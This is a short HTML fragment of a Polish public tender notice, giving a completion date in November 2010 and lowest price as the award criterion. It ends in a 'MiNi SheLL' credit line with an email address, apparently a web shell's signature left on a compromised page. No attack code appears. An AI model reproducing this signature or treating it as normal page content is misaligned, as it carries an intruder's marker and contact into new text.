<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com